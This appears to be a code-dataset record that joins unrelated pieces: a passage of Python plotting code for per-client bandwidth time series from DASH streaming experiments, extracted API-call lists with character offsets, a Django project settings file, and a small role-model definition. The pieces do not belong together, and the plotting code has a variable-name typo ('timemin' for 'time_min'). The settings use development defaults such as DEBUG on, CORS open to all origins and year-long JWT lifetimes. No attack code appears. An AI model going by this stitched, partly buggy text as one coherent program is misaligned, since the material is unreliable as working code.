label=clientIP, color=_FRAGMENTQUALITY_COLORS[key], linestyle="None")
k += 1
createfolder(folderpath)
plt.tight_layout()
pdfpage = PdfPages(folderpath + title + "-" + str(clientrank) + ".pdf")
pdfpage.savefig( bbox_inches="tight")
pdfpage.close()
plt.savefig(folderpath + title + "-" + str(clientrank) + ".png", bbox_inches="tight")
plt.close()
createfolder(folderpath)
if not plotfragmentquality:
plt.tight_layout()
pdfpage = PdfPages(folderpath + title + ".pdf")
pdfpage.savefig( bbox_inches="tight")
pdfpage.close()
plt.savefig(folderpath + title + ".png", bbox_inches="tight")
plt.close()
return
def passivetimeseries_usingbandwidthseparatedflows_plot(results, title, folderpath, ylim, title2=""):
legendlabels = []
ytick_labels = []
ytick_positions = []
time_min = None
time_max = None
xvalues=[]
yvalues = []
titles =[]
clientnum = 1
for clientIP, clientresults in results.items():
times = OrderedDict()
bandwidths = OrderedDict()
for elem in clientresults:
if elem["clientPort"] not in times:
times[elem["clientPort"]] = []
bandwidths[elem["clientPort"]] = []
times[elem["clientPort"]].append (elem["timestamp"])
bandwidths[elem["clientPort"]].append(elem["bandwidthMbps"])
if time_min == None:
time_min = elem["timestamp"]
time_max = elem["timestamp"]
if time_min > elem["timestamp"]:
timemin = elem["timestamp"]
if time_max < elem["timestamp"]:
time_max = elem["timestamp"]
#xvalues.append(times)
#yvalues.append(bandwidths)
#titles.append(clientIP)
colsnum = 2
rowsnumber = int(math.ceil(1.0 * len(times)/colsnum))
plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=colsnum, plottitle=title,
rowsnumber=rowsnumber)
#k = 0
x = 0
y = 0
counter = 1
print("columns: " + str(colsnum) + ", rows: " + str(int(math.ceil(1.0 * len(times)/colsnum))))
for key in times: #for each sublot
print ("plot[" + str(x) + ", " + str(y) + "]")
if len(times[key]) != 0:
ax[x, y].tick_params(axis="both", labelsize=_TICK_SIZE)
ax[x, y].set_xlabel("t", fontsize=_XLABEL_SIZE)
ax[x, y].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
ax[x, y].set_ylim(0,ylim)
ax[x, y].set_xlim(time_min,time_max)
#ax[x, y].set_title(str(counter) + " of " + str(len(times)) + " with IP = " + clientIP + " and port = " + \
# str(key) + "___" + str(datetime.datetime.now()) + title2)
if title2 != "":
title2 = "_" + title2
ax[x, y].set_title(str(counter) + " of " + str(len(times)) + " with IP = " + clientIP + " and port = " + \
str(key) + title2, fontsize=_TITLE_SIZE)
ax[x, y].xaxis.set_major_formatter(xfmt)
ax[x, y].plot(times[key], bandwidths[key], marker =_TIMEPLOT_MARKERS[x+y], markersize=3,
color=_TIMEPLOT_COLORS[x+y], linestyle="None")
x += 1
counter += 1
if x == rowsnumber:
x = 0
y +=1
print (counter)
plotsnum = rowsnumber * colsnum
if counter <= plotsnum:
#remove empty subplots
while True:
print ("delete plot[" + str(x) + ", " + str(y) + "]")
plt.delaxes(ax[x, y])
x += 1
counter += 1
if x == rowsnumber:
x = 0
y +=1
if counter > plotsnum:
break
createfolder(folderpath)
plt.tight_layout()
pdfpage = PdfPages(folderpath + title + "-" + str(clientnum) + ".pdf")
pdfpage.savefig( bbox_inches="tight")
pdfpage.close()
plt.savefig(folderpath + title + "-" + str(clientnum) + ".png", bbox_inches="tight")
clientnum += 1
plt.close()
return
def passivetimeseries_usingbandwidth(config_parser, section, mode, direction, connectiontype, ylim, server, ncol,
legendypos, logger, bucketsize_microsec=None): #edgeserver=edge/cloud
assert mode == "self" or mode == "mim"
assert direction == "downlink"
assert server == "edge" or server == "cloud"
clientnumberlist = getclientnumberlist(config_parser=config_parser, section=section, conntype=connectiontype)
dashfileslist = getdashfilelist(config_parser=config_parser, section=section)
noiselist = getnoiselist(config_parser=config_parser, section=section)
evaluate_fragmentquality=config_parser.getboolean(section, "evaluate_fragmentquality")
logger.debug("clientnumberlist " + str(clientnumberlist))
logger.debug("dashfileslist " + str(dashfileslist))
logger.debug("noiselist " + str(noiselist))
logger.debug("mode " + mode)
print("clientnumberlist " + str(clientnumberlist))
print("dashfileslist " + str(dashfileslist))
print("noiselist " + str(noiselist))
print("mode " + mode)
print("bucket size: " + str(bucketsize_microsec))
for clientnumber in clientnumberlist:
for noise in noiselist:
for dashfile in dashfileslist:
title = str(mode) + "-" + str(direction) + "-" + str(dashfile) + str(clientnumber) + "-"
title += str(noise) + "-" + str(server) + "_plot2"
filename = "csv/passive/sorted/" + mode + "-bandwidth-" + direction + "-" + connectiontype + "-"
filename += str(clientnumber) + "clients-" + dashfile + "-noise" + noise + "_"
filename += config_parser.get(section, "from_passive") + "-"
filename += config_parser.get(section, "to_passive") + "_SORTED.csv"
folderpath = "time/bandwidth/" + str(connectiontype) + "/"
if mode == "self":
ret = readbandwidthvalues_self_timeplot(config_parser=config_parser, section=section,
inputfile=filename, segment=server,
conntype=connectiontype, logger=logger)
passivetimeseries_usingbandwidth_plot(results=ret, title=title, folderpath=folderpath, ylim=ylim)
if evaluate_fragmentquality:
passivetimeseries_usingbandwidth_plot(results=ret, title=title + "_fragmentquality", folderpath=folderpath,
ylim=ylim, plotfragmentquality=True)
passivetimeseries_usingbandwidthseparatedflows_plot(results=ret, title=title,
folderpath=folderpath, ylim=ylim)
else:
title2 = "_" + str(1.0 * bucketsize_microsec / 1000000) + "s"
ret = readbandwidthvalues_mim_timeplot_usingfixbuckets(config_parser=config_parser,
section=section, inputfile=filename, segment=server,
conntype=connectiontype, logger=logger,
bucketsize_microsec=bucketsize_microsec)
#plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1,
# plottitle=title + "_" + str(1.0 * bucketsize_microsec / 1000000) + "s",
# rowsnumber=len(ret))
passivetimeseries_usingbandwidth_plot(results=ret, title=title,
folderpath=folderpath, ylim=ylim, title2=title2)
plt.close()
def passivetimeseries_usingclientports_plot(plt, ax, xfmt, results, title, folderpath, ylim):
legendlabels = []
ytick_labels = []
ytick_positions = []
time_min = None
time_max = None
xvalues=[]
yvalues = []
titles =[]
for clientIP, clientresults in results.items():
times = []
clientportsnumber = []
clientportslist =[]
first_timestamp = None
for elem in clientresults:
if time_min == None:
time_min = elem["timestamp"]
time_max = elem["timestamp"]
if time_min > elem["timestamp"]:
timemin = elem["timestamp"]
if time_max < elem["timestamp"]:
time_max = elem["timestamp"]
if first_timestamp == None:
first_timestamp = elem["timestamp"]
clientportslist.append(elem["clientPort"])
continue
if (elem["timestamp"] - first_timestamp).total_seconds() < _BUCKETSIZE_SEC_PORTS:
if elem["clientPort"] not in clientportslist:
clientportslist.append(elem["clientPort"])
continue
times.append(elem["timestamp"])
clientportsnumber.append(len(clientportslist))
first_timestamp = elem["timestamp"]
clientportslist = [elem["clientPort"]]
xvalues.append(times)
yvalues.append(clientportsnumber)
titles.append(clientIP)
for k in range(0, len(xvalues)): #for each sublot
if len(xvalues[k]) != 0:
ax[k, 0].tick_params(axis="both", labelsize=_TICK_SIZE)
ax[k, 0].set_xlabel("t", fontsize=_XLABEL_SIZE)
ax[k, 0].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
ax[k, 0].set_ylim(0,ylim)
ax[k, 0].set_xlim(time_min,time_max)
#ax[k, 0].set_title("client " + str(k + 1) + "- with IP = " + titles[k] + "___" + \
# str(datetime.datetime.now()))
ax[k, 0].set_title("client " + str(k + 1) + "- with IP = " + titles[k], fontsize=_TITLE_SIZE)
ax[k, 0].xaxis.set_major_formatter(xfmt)
ax[k, 0].plot(xvalues[k], yvalues[k], marker =_TIMEPLOT_MARKERS[k], markersize=3,
label=titles[k], color=_TIMEPLOT_COLORS[k], linestyle="None")
createfolder(folderpath)
plt.tight_layout()
pdfpage = PdfPages(folderpath + title + ".pdf")
pdfpage.savefig( bbox_inches="tight")
pdfpage.close()
plt.savefig(folderpath + title + ".png", bbox_inches="tight")
return
def passivetimeseries_usingclientports(config_parser, section, mode, direction, connectiontype, ylim, server, ncol,
legendypos, logger): #edgeserver=edge/cloud
assert mode == "self"
clientnumberlist = getclientnumberlist(config_parser=config_parser, section=section, conntype=connectiontype)
dashfileslist = getdashfilelist(config_parser=config_parser, section=section)
noiselist = getnoiselist(config_parser=config_parser, section=section)
logger.debug("clientnumberlist" + str(clientnumberlist))
logger.debug ("dashfileslist" + str(dashfileslist))
logger.debug ("noiselist" + str(noiselist))
for clientnumber in clientnumberlist:
for noise in noiselist:
for dashfile in dashfileslist:
title = str(mode) + "-" + str(direction) + "-" + str(dashfile) + str(clientnumber) + "-"
title += str(noise) + "-" + str(server) + "_plotclientports"
filename = "csv/passive/sorted/" + mode + "-bandwidth-" + direction + "-" + connectiontype + "-"
filename += str(clientnumber) + "clients-" + dashfile + "-noise" + noise + "_"
filename += config_parser.get(section, "from_passive") + "-"
filename += config_parser.get(section, "to_passive") + "_SORTED.csv"
folderpath = "time/bandwidth/" + str(connectiontype) + "/"
ret = readbandwidthvalues_self_timeplot(config_parser=config_parser, section=section, inputfile=filename,
segment=server, conntype=connectiontype, logger=logger)
plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1, plottitle=title,
rowsnumber=len(ret))
#passivetimeseries_usingbandwidth_plot(plt=plt, ax=ax, xfmt=xfmt, results=ret, title=title,
# folderpath=folderpath, ylim=ylim)
passivetimeseries_usingclientports_plot(plt=plt, ax=ax, xfmt=xfmt, results=ret, title=title,
folderpath=folderpath, ylim=ylim)
plt.close()
|
[
"matplotlib.backends.backend_pdf.PdfPages",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.close",
"matplotlib.pyplot.yticks",
"readcsv.readbandwidthvalues_mim_timeplot_usingfixbuckets",
"matplotlib.dates.DateFormatter",
"datetime.datetime.now",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.delaxes",
"matplotlib.pyplot.gcf",
"readcsv.readbandwidthvalues_mim_timeplot",
"sys.exit",
"os.makedirs",
"matplotlib.pyplot.plot",
"readcsv.readbandwidthvalues_self_timeplot",
"collections.OrderedDict",
"matplotlib.pyplot.savefig"
] |
[((2029, 2068), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 0.6 * nclient)'}), '(figsize=(15, 0.6 * nclient))\n', (2039, 2068), True, 'import matplotlib.pyplot as plt\n'), ((2077, 2086), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2084, 2086), True, 'import matplotlib.pyplot as plt\n'), ((2467, 2494), 'matplotlib.dates.DateFormatter', 'md.DateFormatter', (['formatter'], {}), '(formatter)\n', (2483, 2494), True, 'import matplotlib.dates as md\n'), ((3657, 3698), 'matplotlib.pyplot.yticks', 'plt.yticks', (['ytick_positions', 'ytick_labels'], {}), '(ytick_positions, ytick_labels)\n', (3667, 3698), True, 'import matplotlib.pyplot as plt\n'), ((3759, 3796), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (["(folderpath + title + '.pdf')"], {}), "(folderpath + title + '.pdf')\n", (3767, 3796), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((3864, 3925), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(folderpath + title + '.png')"], {'bbox_inches': '"""tight"""'}), "(folderpath + title + '.png', bbox_inches='tight')\n", (3875, 3925), True, 'import matplotlib.pyplot as plt\n'), ((3930, 3941), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3939, 3941), True, 'import matplotlib.pyplot as plt\n'), ((6556, 6619), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': 'colsnumber', 'nrows': 'rowsnumber', 'squeeze': '(False)'}), '(ncols=colsnumber, nrows=rowsnumber, squeeze=False)\n', (6568, 6619), True, 'import matplotlib.pyplot as plt\n'), ((6874, 6901), 'matplotlib.dates.DateFormatter', 'md.DateFormatter', (['formatter'], {}), '(formatter)\n', (6890, 6901), True, 'import matplotlib.dates as md\n'), ((22035, 22053), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (22051, 22053), True, 'import matplotlib.pyplot as plt\n'), ((22069, 22106), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (["(folderpath + title + '.pdf')"], {}), "(folderpath + title + '.pdf')\n", (22077, 22106), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((22174, 22235), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(folderpath + title + '.png')"], {'bbox_inches': '"""tight"""'}), "(folderpath + title + '.png', bbox_inches='tight')\n", (22185, 22235), True, 'import matplotlib.pyplot as plt\n'), ((1816, 1842), 'os.makedirs', 'os.makedirs', (['directoryname'], {}), '(directoryname)\n', (1827, 1842), False, 'import os\n'), ((3412, 3528), 'matplotlib.pyplot.plot', 'plt.plot', (['times', 'ypos'], {'marker': '_TIMEPLOT_MARKERS[i]', 'linestyle': '"""None"""', 'label': 'clientIP', 'color': '_TIMEPLOT_COLORS[i]'}), "(times, ypos, marker=_TIMEPLOT_MARKERS[i], linestyle='None', label=\n clientIP, color=_TIMEPLOT_COLORS[i])\n", (3420, 3528), True, 'import matplotlib.pyplot as plt\n'), ((11595, 11613), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11611, 11613), True, 'import matplotlib.pyplot as plt\n'), ((11633, 11670), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (["(folderpath + title + '.pdf')"], {}), "(folderpath + title + '.pdf')\n", (11641, 11670), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((11750, 11811), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(folderpath + title + '.png')"], {'bbox_inches': '"""tight"""'}), "(folderpath + title + '.png', bbox_inches='tight')\n", (11761, 11811), True, 'import matplotlib.pyplot as plt\n'), ((11827, 11838), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11836, 11838), True, 'import matplotlib.pyplot as plt\n'), ((12199, 12212), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (12210, 12212), False, 'from collections import OrderedDict\n'), ((12234, 12247), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (12245, 12247), False, 'from collections import OrderedDict\n'), ((15270, 15288), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (15286, 15288), True, 'import matplotlib.pyplot as plt\n'), ((15566, 15577), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15575, 15577), True, 'import matplotlib.pyplot as plt\n'), ((2403, 2412), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (2410, 2412), True, 'import matplotlib.pyplot as plt\n'), ((6809, 6818), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (6816, 6818), True, 'import matplotlib.pyplot as plt\n'), ((1950, 1961), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1958, 1961), False, 'import sys\n'), ((2291, 2314), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2312, 2314), False, 'import datetime\n'), ((6757, 6780), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (6778, 6780), False, 'import datetime\n'), ((11201, 11219), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11217, 11219), True, 'import matplotlib.pyplot as plt\n'), ((11514, 11525), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11523, 11525), True, 'import matplotlib.pyplot as plt\n'), ((14977, 14998), 'matplotlib.pyplot.delaxes', 'plt.delaxes', (['ax[x, y]'], {}), '(ax[x, y])\n', (14988, 14998), True, 'import matplotlib.pyplot as plt\n'), ((23712, 23876), 'readcsv.readbandwidthvalues_self_timeplot', 'readbandwidthvalues_self_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (23745, 23876), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((24563, 24574), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (24572, 24574), True, 'import matplotlib.pyplot as plt\n'), ((2365, 2388), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2386, 2388), False, 'import datetime\n'), ((5496, 5660), 'readcsv.readbandwidthvalues_self_timeplot', 'readbandwidthvalues_self_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (5529, 5660), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((17558, 17722), 'readcsv.readbandwidthvalues_self_timeplot', 'readbandwidthvalues_self_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (17591, 17722), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((18617, 18842), 'readcsv.readbandwidthvalues_mim_timeplot_usingfixbuckets', 'readbandwidthvalues_mim_timeplot_usingfixbuckets', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger', 'bucketsize_microsec': 'bucketsize_microsec'}), '(config_parser=\n config_parser, section=section, inputfile=filename, segment=server,\n conntype=connectiontype, logger=logger, bucketsize_microsec=\n bucketsize_microsec)\n', (18665, 18842), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((19491, 19502), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (19500, 19502), True, 'import matplotlib.pyplot as plt\n'), ((5836, 5999), 'readcsv.readbandwidthvalues_mim_timeplot', 'readbandwidthvalues_mim_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (5868, 5999), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((6341, 6352), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (6349, 6352), False, 'import sys\n')]
|
"""
Django settings for scaffold project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import datetime
import os
from rest_framework import ISO_8601
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'django_extensions',
'social_django',
'drf_jwt_util',
'rest_framework',
'user',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'scaffold.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'scaffold.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'ja-JP'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'user.User'
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_HEADERS = (
'X-CSRFToken',
'Content-Type',
'Authorization',
'Origin',
'Content-Disposition',
'x-oauth2-callback-uri', # oauth2で独自利用
)
JWT_AUTH = {
'JWT_EXPIRATION_DELTA': datetime.timedelta(days=365),
'JWT_ALLOW_REFRESH': True,
'JWT_REFRESH_EXPIRATION_DELTA': datetime.timedelta(days=365),
'JWT_PAYLOAD_HANDLER': 'drf_jwt_util.jwt.jwt_payload_handler',
'JWT_RESPONSE_PAYLOAD_HANDLER': 'drf_jwt_util.jwt.jwt_response_payload_handler',
'JWT_PAYLOAD_GET_USERNAME_HANDLER': 'drf_jwt_util.jwt.jwt_get_username_from_payload_handler',
}
# http://www.django-rest-framework.org/
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 100,
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'drf_jwt_util.auth.JWTAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_RENDERER_CLASSES': (
'djangorestframework_camel_case.render.CamelCaseJSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'djangorestframework_camel_case.parser.CamelCaseJSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DATE_INPUT_FORMATS': (ISO_8601, '%Y/%m/%d'),
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.URLPathVersioning',
}
DRF_JWT_UTIL = {
"USER_SERIALIZER": "user.serializers.UserSerializer",
}
|
[
"os.path.abspath",
"datetime.timedelta",
"os.path.join"
] |
[((3541, 3569), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(365)'}), '(days=365)\n', (3559, 3569), False, 'import datetime\n'), ((3638, 3666), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(365)'}), '(days=365)\n', (3656, 3666), False, 'import datetime\n'), ((488, 513), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (503, 513), False, 'import os\n'), ((2393, 2429), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""db.sqlite3"""'], {}), "(BASE_DIR, 'db.sqlite3')\n", (2405, 2429), False, 'import os\n')]
|
from db import db
class Role(db.Model):
__tablename__='roles'
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(50), unique=True)
#Define the UserRoles association table
class UserRoles(db.Model):
__tablename__ = 'user_roles'
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('users.id', ondelete='CASCADE'))
role_id = db.Column(db.Integer(), db.ForeignKey('roles.id', ondelete='CASCADE'))
|
[
"db.db.String",
"db.db.Integer",
"db.db.ForeignKey"
] |
[((87, 99), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (97, 99), False, 'from db import db\n'), ((140, 153), 'db.db.String', 'db.String', (['(50)'], {}), '(50)\n', (149, 153), False, 'from db import db\n'), ((289, 301), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (299, 301), False, 'from db import db\n'), ((345, 357), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (355, 357), False, 'from db import db\n'), ((359, 404), 'db.db.ForeignKey', 'db.ForeignKey', (['"""users.id"""'], {'ondelete': '"""CASCADE"""'}), "('users.id', ondelete='CASCADE')\n", (372, 404), False, 'from db import db\n'), ((430, 442), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (440, 442), False, 'from db import db\n'), ((444, 489), 'db.db.ForeignKey', 'db.ForeignKey', (['"""roles.id"""'], {'ondelete': '"""CASCADE"""'}), "('roles.id', ondelete='CASCADE')\n", (457, 489), False, 'from db import db\n')]
|